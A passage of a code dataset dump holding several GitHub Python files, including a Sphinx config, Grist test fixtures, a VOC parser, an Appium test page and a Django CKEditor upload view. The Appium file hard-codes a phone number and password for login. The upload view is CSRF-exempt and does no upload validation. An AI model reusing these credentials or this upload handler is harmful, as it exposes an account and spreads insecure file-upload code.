"data_generation.generate_config.PRECLF_SIZE", "line_number": 36, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config", "line_number": 36, "usage_type": "name"}, {"api_name": "torch.backends", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.OneCycleLR", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 60, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "attribute"}, {"api_name": "torch.utils", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 107, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 116, "usage_type": "attribute"}, {"api_name": "torch.max", "line_number": 121, "usage_type": "call"}, {"api_name": "train.train_utils.utils.save_model", "line_number": 134, "usage_type": "call"}, {"api_name": "train.train_utils.utils", "line_number": 134, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 142, "usage_type": "attribute"}, {"api_name": "train.datasets.ClfDataset", "line_number": 148, "usage_type": "call"}, {"api_name": "train.datasets", "line_number": 148, "usage_type": "name"}, {"api_name": "data_generation.generate_config.IMAGE_EXT", "line_number": 148, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config", "line_number": 148, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 149, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 149, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 143, "usage_type": "name"}, {"api_name": "torch.utils", "line_number": 143, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 155, "usage_type": "attribute"}, {"api_name": "torch.optim.SGD", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 162, "usage_type": "attribute"}, {"api_name": "torch.optim.RMSprop", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 173, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 155, "usage_type": "attribute"}, {"api_name": "torch.random.manual_seed", "line_number": 183, "usage_type": "call"}, {"api_name": "torch.random", "line_number": 183, "usage_type": "attribute"}, {"api_name": "torch.cuda.is_available", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 185, "usage_type": "attribute"}, {"api_name": "torch.cuda.random.manual_seed", "line_number": 186, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 186, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 188, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 194, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 203, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 211, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 211, "usage_type": "attribute"}, {"api_name": "shutil.copy", "line_number": 214, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 219, "usage_type": "call"}]} +{"seq_id": "21198317732", "text": "from datetime import datetime\nimport pandas as pd\nimport os\nfrom datetime import timedelta\n\nnome_list = []\n\ndir = input(\"Input directory: \")\n\nano_inicial = input(\"Input data inicial - timestep: \")\ndata_fmt = input(\"Input formato datetime: \")\nano_inicial_data = datetime.strptime(ano_inicial.strip(), data_fmt)\n\ndata_final_lista = pd.DataFrame(columns=[\"data\",\"dias\"])\n\nfor nome_arquivo in os.listdir(dir):\n #print(nome_arquivo.split(\".\")[0])\n \n dias=int(nome_arquivo.split(\".\")[0])\n \n data_final = ano_inicial_data + timedelta(days=dias*3)\n data_formatada = data_final.strftime(data_fmt)\n print(data_formatada)\n \n os.rename(dir + nome_arquivo, dir + data_formatada + \".nc\")\n \n data_final_lista = data_final_lista.append({\"data\":data_formatada,\"dias\":dias}, ignore_index=True)\n\ndata_final_lista.to_csv(\"lista_datas.csv\")", "repo_name": "IgorErhardt/Cod_Bank", "sub_path": "Filename_to_YMD.py", "file_name": "Filename_to_YMD.py", "file_ext": "py", "file_size_in_byte": 853, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 14, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 21, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "33513543923", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# -- General configuration -----------------------------------------------------\n\nimport datetime\nimport warnings\nimport sys\nimport os\n\nwarnings.simplefilter('ignore', DeprecationWarning)\n\n# Add any Sphinx extension module names here, as strings. They can be extensions\n# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.\nextensions = [\n 'sphinx.ext.autodoc',\n 'sphinx.ext.doctest',\n 'repoze.sphinx.autointerface',\n 'sphinx.ext.viewcode',\n 'sphinx.ext.intersphinx'\n]\n\nintersphinx_mapping = {\n #'zcomponent': ('http://docs.zope.org/zope.component', None),\n 'sqla': ('http://docs.sqlalchemy.org/en/latest', None),\n 'validictory': ('http://validictory.readthedocs.org/en/latest', None),\n 'who': ('http://docs.repoze.org/who/latest', None),\n 'python3': ('http://docs.python.org/3', None),\n 'tstring': ('http://docs.pylonsproject.org/projects/translationstring/en/latest', None),\n 'venusian': ('http://docs.pylonsproject.org/projects/venusian/en/latest', None),\n}\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = ['_templates']\n\n# The suffix of source filenames.\nsource_suffix = '.rst'\n\nmaster_doc = 'index'\n\n# General information about the project.\nproject = 'edapi'\nthisyear = datetime.datetime.now().year\ncopyright = '2013-%s, Amplify Insight ' % thisyear\n\n\nversion = '1.0'\n\nrelease = version\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\nexclude_patterns = ['_build']\n\n# If true, the current module name will be prepended to all description\n# unit titles (such as .. function::).\nadd_module_names = False\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = 'sphinx'\n\n\n# -- Options for HTML output ---------------------------------------------------\n\nsys.path.append(os.path.abspath('_themes'))\nhtml_theme_path = ['_themes']\nhtml_theme = 'pyramid'\n\n# The name for this set of Sphinx documents. If None, it defaults to\n# \" v documentation\".\nhtml_title = 'EdAPI RESTful Development Framework'\n\n# A shorter title for the navigation bar. Default is the same as html_title.\n#html_short_title = None\n\n# The name of an image file (relative to this directory) to place at the top\n# of the sidebar.\n#html_logo = None\n\n# The name of an image file (within the static path) to use as favicon of the\n# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32\n# pixels large.\n#html_favicon = None\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = ['_static']\n\n# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,\n# using the given strftime format.\nhtml_last_updated_fmt = '%b %d, %Y'\n\n# If true, SmartyPants will be used to convert quotes and dashes to\n# typographically correct entities.\n#html_use_smartypants = True\n\n# Custom sidebar templates, maps document names to template names.\n#html_sidebars = {}\n\n# Additional templates that should be rendered to pages, maps page names to\n# template names.\n#html_additional_pages = {}\n\n# If false, no module index is generated.\n#html_domain_indices = True\n\n# If false, no index is generated.\n#html_use_index = True\n\n# If true, the index is split into individual pages for each letter.\n#html_split_index = False\n\n# If true, links to the reST sources are added to the pages.\n#html_show_sourcelink = True\n\nhtml_show_sphinx = False\nhtml_show_copyright = True\n\n# If true, an OpenSearch description file will be output, and all pages will\n# contain a tag referring to it. The value of this option must be the\n# base URL from which the finished HTML is served.\n#html_use_opensearch = ''\n\n# This is the file name suffix for HTML files (e.g. \".xhtml\").\n#html_file_suffix = None\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = 'edapidoc'\n\n\n# -- Options for LaTeX output --------------------------------------------------\n\nlatex_elements = {\n # The paper size ('letterpaper' or 'a4paper').\n #'papersize': 'letterpaper',\n\n # The font size ('10pt', '11pt' or '12pt').\n #'pointsize': '10pt',\n\n # Additional stuff for the LaTeX preamble.\n #'preamble': '',\n}\n\n# Grouping the document tree into LaTeX files. List of tuples\n# (source start file, target name, title, author, documentclass [howto/manual]).\nlatex_documents = [('index', 'edapi.tex', 'edapi Documentation',\n '@dip @tosako @agrebneva @dwu', 'manual'),\n ]\n\n# The name of an image file (relative to this directory) to place at the top of\n# the title page.\n#latex_logo = None\n\n# For \"manual\" documents, if this is true, then toplevel headings are parts,\n# not chapters.\n#latex_use_parts = False\n\n# If true, show page references after internal links.\n#latex_show_pagerefs = False\n\n# If true, show URL addresses after external links.\n#latex_show_urls = False\n\n# Documents to append as an appendix to all manuals.\n#latex_appendices = []\n\n# If false, no module index is generated.\n#latex_domain_indices = True\n\n\n# -- Options for manual page output --------------------------------------------\n\n# One entry per manual page. List of tuples\n# (source start file, name, description, authors, manual section).\nman_pages = [\n ('index', 'edapi', 'edapi Documentation',\n ['@dip @tosako @agrebneva @dwu'], 1)\n]\n\n# If true, show URL addresses after external links.\n#man_show_urls = False\n\n\n# -- Options for Texinfo output ------------------------------------------------\n\n# Grouping the document tree into Texinfo files. List of tuples\n# (source start file, target name, title, author,\n# dir menu entry, description, category)\ntexinfo_documents = [('index', 'edapi', 'edapi Documentation',\n '@dip @tosako @agrebneva @dwu', 'edapi', 'One line description of project.',\n 'Miscellaneous'),\n ]\n\n# Documents to append as an appendix to all manuals.\n#texinfo_appendices = []\n\n# If false, no module index is generated.\n#texinfo_domain_indices = True\n\n# How to display URL addresses: 'footnote', 'no', or 'inline'.\n#texinfo_show_urls = 'footnote'\n\n# If true, do not generate a @detailmenu in the \"Top\" node's menu.\n#texinfo_no_detailmenu = False\n", "repo_name": "SmarterApp/RDW_DataWarehouse", "sub_path": "edapi/docs/conf.py", "file_name": "conf.py", "file_ext": "py", "file_size_in_byte": 6457, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "warnings.simplefilter", "line_number": 10, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 42, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 42, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 64, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}]} +{"seq_id": "14382680878", "text": "from test.defaults import (GRIST_API_KEY, GRIST_DOC_ID,\n GRIST_SERVER_FROM_LOCAL, GRIST_SERVER_FROM_POSTGRES,\n POSTGRES_HOST, POSTGRES_PASSWORD, POSTGRES_PORT,\n POSTGRES_USER)\n\nimport psycopg2\nimport pytest\nfrom grist_api import GristDocAPI\n\n\n@pytest.fixture\ndef conn():\n \"\"\"\n Connection to postgres with multicorn and gristfdw installed\n \"\"\"\n with psycopg2.connect(f\"postgres://{POSTGRES_USER}:{POSTGRES_PASSWORD}@{POSTGRES_HOST}:{POSTGRES_PORT}\") as c:\n\n with c.cursor() as cur:\n cur.execute(\"\"\"\n CREATE EXTENSION IF NOT EXISTS multicorn;\n \"\"\")\n\n yield c\n\n\n@pytest.fixture\ndef server(conn):\n \"\"\"\n Sets up our external server in postgres\n \"\"\"\n with conn.cursor() as cur:\n cur.execute(f\"DROP SERVER IF EXISTS test\")\n\n with conn.cursor() as cur:\n cur.execute(f\"\"\"\n CREATE SERVER test FOREIGN DATA WRAPPER multicorn OPTIONS (\n wrapper 'gristfdw.GristForeignDataWrapper',\n api_key '{GRIST_API_KEY}',\n doc_id '{GRIST_DOC_ID}',\n server '{GRIST_SERVER_FROM_POSTGRES}'\n );\n \"\"\")\n\n yield \"test\"\n\n with conn.cursor() as cur:\n cur.execute(f\"DROP SERVER IF EXISTS test CASCADE\")\n\n\n@pytest.fixture\ndef schema(conn):\n name = \"gristfdw_schema\"\n\n with conn.cursor() as cur:\n cur.execute(f\"\"\"DROP SCHEMA IF EXISTS {name};\"\"\")\n\n with conn.cursor() as cur:\n cur.execute(f\"\"\"CREATE SCHEMA {name};\"\"\")\n\n yield name\n\n with conn.cursor() as cur:\n cur.execute(f\"\"\"DROP SCHEMA IF EXISTS {name} CASCADE;\"\"\")\n\n\n@pytest.fixture\ndef simple_table(conn, server, table_name):\n\n with conn.cursor() as cur:\n cur.execute(\"DROP FOREIGN TABLE IF EXISTS \\\"{table_name}\\\"\")\n with conn.cursor() as cur:\n cur.execute(f\"\"\"\n CREATE FOREIGN TABLE \\\"{table_name}\\\" (\n id BIGINT,\n col1 TEXT,\n col2 FLOAT,\n col3 BIGINT,\n col4 BOOLEAN,\n col5 DATE,\n col9 BIGINT,\n col10 BIGINT[]\n )\n SERVER {server}\n OPTIONS (table_name '{table_name}')\n \"\"\")\n yield\n with conn.cursor() as cur:\n cur.execute(\"DROP FOREIGN TABLE IF EXISTS \\\"{table_name}\\\" CASCADE\")\n\n\n@pytest.fixture\ndef grist_api(monkeypatch):\n monkeypatch.setenv(\"GRIST_API_KEY\", GRIST_API_KEY)\n return GristDocAPI(GRIST_DOC_ID, server=GRIST_SERVER_FROM_LOCAL)\n\n\n@pytest.fixture\ndef assert_grist_table(table_name, grist_api):\n def inner(expected):\n actual = grist_api.fetch_table(table_name)\n\n # Convert namedtuples to dicts\n # Filter out gristHelper_display, which is for reference columns\n actual_asdict = [\n {\n k: v\n for k, v in t._asdict().items()\n if not k.startswith(\"gristHelper_Display\")\n }\n for t in actual\n ]\n\n assert actual_asdict == expected\n\n return inner\n", "repo_name": "johncant/gristfdw", "sub_path": "test/fixtures/integration.py", "file_name": "integration.py", "file_ext": "py", "file_size_in_byte": 3107, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "psycopg2.connect", "line_number": 16, "usage_type": "call"}, {"api_name": "test.defaults.POSTGRES_USER", "line_number": 16, "usage_type": "name"}, {"api_name": "test.defaults.POSTGRES_PASSWORD", "line_number": 16, "usage_type": "name"}, {"api_name": "test.defaults.POSTGRES_HOST", "line_number": 16, "usage_type": "name"}, {"api_name": "test.defaults.POSTGRES_PORT", "line_number": 16, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 11, "usage_type": "attribute"}, {"api_name": "test.defaults.GRIST_API_KEY", "line_number": 38, "usage_type": "name"}, {"api_name": "test.defaults.GRIST_DOC_ID", "line_number": 39, "usage_type": "name"}, {"api_name": "test.defaults.GRIST_SERVER_FROM_POSTGRES", "line_number": 40, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 66, "usage_type": "attribute"}, {"api_name": "test.defaults.GRIST_API_KEY", "line_number": 93, "usage_type": "argument"}, {"api_name": "grist_api.GristDocAPI", "line_number": 94, "usage_type": "call"}, {"api_name": "test.defaults.GRIST_DOC_ID", "line_number": 94, "usage_type": "argument"}, {"api_name": "test.defaults.GRIST_SERVER_FROM_LOCAL", "line_number": 94, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 91, "usage_type": "attribute"}, {"api_name": "grist_api.fetch_table", "line_number": 100, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 97, "usage_type": "attribute"}]} +{"seq_id": "69973733929", "text": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport xml.etree.ElementTree as ET\n\n\nclasses_name = [\n \"aeroplane\", \"bicycle\", \"bird\", \"boat\", \"bottle\",\n \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\",\n \"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\",\n \"sheep\", \"sofa\", \"train\",\"tvmonitor\"\n]\n\nclasses_num = {\n 'aeroplane': 0, 'bicycle': 1, 'bird': 2, 'boat': 3, 'bottle': 4,\n 'bus': 5, 'car': 6, 'cat': 7, 'chair': 8, 'cow': 9, 'diningtable': 10,\n 'dog': 11, 'horse': 12, 'motorbike': 13, 'person': 14, 'pottedplant': 15,\n 'sheep': 16, 'sofa': 17, 'train': 18, 'tvmonitor': 19\n}\n\nDATA_ROOT = \"/Volumes/projects/DataSets/VOC\"\nDATA_PATH = os.path.join(DATA_ROOT, \"VOCdevkit/\")\nOUTPUT_PATH = os.path.join(DATA_ROOT, \"pascal_voc_{}.txt\")\n\n\ndef parse_xml(xml_file, year=2007):\n \"\"\"\n Args:\n xml_file: the input xml file path\n\n Returns:\n image_path: string\n labels: list of [xmin, ymin, xmax, ymax, class]\n \"\"\"\n tree = ET.parse(xml_file)\n root = tree.getroot()\n image_path = ''\n labels = []\n\n for item in root:\n if item.tag == 'filename':\n if year == 2007:\n image_path = os.path.join(\n DATA_PATH, 'VOC2007/JPEGImages', item.text)\n if year == 2012:\n image_path = os.path.join(\n DATA_PATH, 'VOC2012/JPEGImages', item.text)\n elif item.tag == 'object':\n obj_name = item[0].text\n obj_num = classes_num[obj_name]\n bndbox = item.find(\"bndbox\")\n xmin = int(float(bndbox.find(\"xmin\").text))\n ymin = int(float(bndbox.find(\"ymin\").text))\n xmax = int(float(bndbox.find(\"xmax\").text))\n ymax = int(float(bndbox.find(\"ymax\").text))\n labels.append([xmin, ymin, xmax, ymax, obj_num])\n\n return image_path, labels\n\n\ndef convert_to_string(image_path, labels):\n out_string = ''\n out_string += image_path\n for label in labels:\n for i in label:\n out_string += ' ' + str(i)\n out_string += '\\n'\n\n return out_string\n\n\ndef run_main(year=2007):\n print(\"Start format voc {} data !\".format(year))\n out_file = open(OUTPUT_PATH.format(year), \"w\")\n if year == 2007:\n xml_dir = os.path.join(DATA_PATH, \"VOC2007/Annotations/\")\n if year == 2012:\n xml_dir = os.path.join(DATA_PATH, \"VOC2012/Annotations/\")\n\n xml_list = os.listdir(xml_dir)\n\n xml_list = [xml_dir + tmp for tmp in xml_list]\n for xml in xml_list:\n if not os.path.isfile(xml):\n print(\"{} not xml file path.\".format(xml))\n image_path, labels = parse_xml(xml, year=year)\n record = convert_to_string(image_path, labels)\n out_file.write(record)\n out_file.close()\n\nif __name__ == '__main__':\n run_main(year=2007)\n run_main(year=2012)\n", "repo_name": "liuguiyangnwpu/DL.EyeSight", "sub_path": "Others/voc/process_pascal_voc.py", "file_name": "process_pascal_voc.py", "file_ext": "py", "file_size_in_byte": 2905, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 49, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 37, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 37, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 82, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 85, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 86, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 86, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 87, "usage_type": "argument"}, {"api_name": "xml.etree.ElementTree", "line_number": 88, "usage_type": "argument"}]} +{"seq_id": "18486014884", "text": "from common.desired_cadps import desired_conf\nfrom selenium.common.exceptions import NoSuchElementException\nimport logging\nfrom selenium.webdriver.common.by import By\nimport time\nimport random\nfrom page.login_page import login\n\n\nclass Home_page(login):\n # 首页入口搜索相关元素\n home_button = (By.ID, \"com.tal.kaoyan:id/mainactivity_button_calendar\")\n search_button = (By.ID, \"com.tal.kaoyan:id/imageSearch\")\n Input_button = (By.ID, \"com.tal.kaoyan:id/customsearchview_contentedittext\")\n SouSu_button = (By.XPATH, \"//*[@text='搜索']\")\n\n def Click_Home(self):\n \"\"\"点击首页入口元素\"\"\"\n self.click(self.home_button)\n\n def Click_Search(self):\n \"\"\"点击搜索框\"\"\"\n self.click(self.search_button)\n\n def Input_Search(self, text):\n \"\"\"输入搜索内容\"\"\"\n self.clear(self.Input_button)\n self.sendKeys(self.Input_button, text)\n\n def Click_Sousu(self):\n \"\"\"点击输入内容后的搜素按钮\"\"\"\n self.click(self.SouSu_button)\n\n # 搜索滑动用例流程\n def Search_Shake_Case(self, username, psw, text):\n self.psw_login(username, psw)\n self.Click_Home()\n time.sleep(2)\n logging.info(\"====My youstar_page returns to the search youstar_page====\")\n self.Click_Search()\n self.Input_Search(text)\n logging.info(\"====Enter search content:%s====\" % text)\n self.getScreenShot(text)\n self.Click_Sousu()\n logging.info(\"====Search content succeeded===\")\n self.getScreenShot(\"Search content succeeded\")\n self.Search_swipe()\n self.Check_Search()\n\n # 滑动两次方法封装,后续用例根据自己需求封装\n def Search_swipe(self):\n for i in range(2):\n self.Swipe_left()\n logging.info(\"=====Swipe left:\" + str(i + 1) + \"次=====\")\n time.sleep(2)\n for i in range(2):\n self.Swipe_right()\n logging.info(\"=====Swipe right:\" + str(i + 1) + \"次=====\")\n time.sleep(2)\n self.getScreenShot(\"Swipe right\" + str(i + 1) + \"次\")\n for i in range(2):\n self.Swipe_Up()\n logging.info(\"=====Swipe Up:\" + str(i + 1) + \"次=====\")\n time.sleep(1)\n self.getScreenShot(\"Swipe Up\" + str(i + 1) + \"次\")\n for i in range(2):\n self.Swipe_Down()\n logging.info(\"=====Swipe Down\" + str(i + 1) + \"次=====\")\n time.sleep(1)\n self.getScreenShot(\"Swipe Down\" + str(i + 1) + \"次\")\n\n # 校验头像更换是否跟换成功,做unittest需要校验是否成功\n def Check_Search(self):\n try:\n self.findElement(self.SouSu_button)\n logging.info(\"校验元素成功!:%s\" % str(self.SouSu_button))\n return True\n\n except NoSuchElementException:\n logging.info(\"没有找到校验元素:%s\" % str(self.SouSu_button))\n return False\n\n\nif __name__ == '__main__':\n driver = desired_conf()\n L = Home_page(driver)\n L.Search_Shake_Case(username=\"13632721415\", psw=\"Chuiling@950720\", text=\"心理学\")", "repo_name": "qangcheng/-appium-test", "sub_path": "page/Home_page.py", "file_name": "Home_page.py", "file_ext": "py", "file_size_in_byte": 3136, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "page.login_page.login", "line_number": 10, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 12, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 12, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 13, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 14, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 14, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 15, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 15, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 39, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 45, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 54, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 55, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 59, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 63, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 64, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 68, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 69, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 76, "usage_type": "call"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 79, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 80, "usage_type": "call"}, {"api_name": "common.desired_cadps.desired_conf", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "18071163082", "text": "from msrest.serialization import Model\n\n\nclass AclList(Model):\n \"\"\"A Data Lake Analytics catalog access control list (ACL).\n\n Variables are only populated by the server, and will be ignored when\n sending a request.\n\n :ivar value: the access control list (ACL).\n :vartype value: list[~azure.mgmt.datalake.analytics.catalog.models.Acl]\n \"\"\"\n\n _validation = {\n 'value': {'readonly': True},\n }\n\n _attribute_map = {\n 'value': {'key': 'value', 'type': '[Acl]'},\n }\n\n def __init__(self):\n super(AclList, self).__init__()\n self.value = None\n", "repo_name": "AntObr/credit-to-customer", "sub_path": "env/lib/python2.7/site-packages/azure/mgmt/datalake/analytics/catalog/models/acl_list.py", "file_name": "acl_list.py", "file_ext": "py", "file_size_in_byte": 594, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "msrest.serialization.Model", "line_number": 4, "usage_type": "name"}]} +{"seq_id": "39513327929", "text": "import os\nfrom typing import Any, Callable, List, Optional, Set\n\nfrom django.core.exceptions import ImproperlyConfigured\n\nfrom posthog.utils import str_to_bool\n\n__all__ = [\"get_from_env\", \"get_list\", \"str_to_bool\"]\n\n\ndef get_from_env(\n key: str,\n default: Any = None,\n *,\n optional: bool = False,\n type_cast: Optional[Callable] = None,\n) -> Any:\n value = os.getenv(key)\n if value is None or value == \"\":\n if optional:\n return None\n if default is not None:\n return default\n else:\n raise ImproperlyConfigured(f'The environment variable \"{key}\" is required to run PostHog!')\n if type_cast is not None:\n return type_cast(value)\n return value\n\n\ndef get_list(text: str) -> List[str]:\n if not text:\n return []\n return [item.strip() for item in text.split(\",\")]\n\n\ndef get_set(text: str) -> Set[str]:\n if not text:\n return set()\n return {item.strip() for item in text.split(\",\")}\n", "repo_name": "PostHog/posthog", "sub_path": "posthog/settings/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 985, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14422, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.Any", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 16, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 18, "usage_type": "call"}, {"api_name": "django.core.exceptions.ImproperlyConfigured", "line_number": 25, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "38765849516", "text": "from django.http import HttpResponse\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom . import utils\nfrom . import settings as ck_settings\n\n\n@csrf_exempt\ndef upload(request):\n \"\"\"\n Uploads a file and send back its URL to CKEditor.\n\n TODO:\n Validate uploads\n \"\"\"\n # Get the uploaded file from request.\n upload = request.FILES['upload']\n\n # Open output file in which to store upload.\n upload_filename = utils.get_upload_filename(upload.name, request.user)\n out = open(upload_filename, 'wb+')\n\n # Iterate through chunks and write to destination.\n for chunk in upload.chunks():\n out.write(chunk)\n out.close()\n\n url = utils.create_thumbnail(upload_filename)\n\n # Respond with Javascript sending ckeditor upload url.\n return HttpResponse(\"\"\"\n \"\"\" % (request.GET['CKEditorFuncNum'], url))\n\n\ndef browse(request):\n return render_to_response('browse.html', RequestContext(request, {\n 'images': utils.get_image_browse_urls(request.user),\n }))\n\n\ndef configs(request):\n merged_configs = {}\n if ck_settings.CONFIGS is not None:\n for config_name, config in ck_settings.CONFIGS.iteritems():\n merged_configs[config_name] = utils.validate_config(config_name)\n\n return render_to_response('ckeditor/configs.js', RequestContext(request, {\n 'debug': ck_settings.CKEDITOR_DEBUG,\n 'timestamp': ck_settings.TIMESTAMP,\n 'merged_configs': utils.pretty_json_encode(merged_configs),\n 'jquery_override_val': utils.json_encode(ck_settings.JQUERY_OVERRIDE_VAL),\n }), mimetype=\"application/x-javascript\")\n\n\n@csrf_exempt\ndef fb_upload(request):\n \"\"\"\n A wrapper around django-filebrowser's file upload view. It returns a\n javascript function call to CKEDITOR.tools.callFunction(), which\n CKEDITOR expects.\n \"\"\"\n try:\n import filebrowser\n except ImportError:\n raise Exception(\"Filebrowser not installed\")\n\n upload_file_view = None\n\n try:\n from filebrowser.sites import site\n except ImportError:\n pass\n else:\n upload_file_view = site._upload_file\n\n if upload_file_view is None:\n try:\n from filebrowser.views import _upload_file\n except ImportError:\n raise Exception(\n \"django-filebrowser must be version 3.3.0 or greater; \"\n 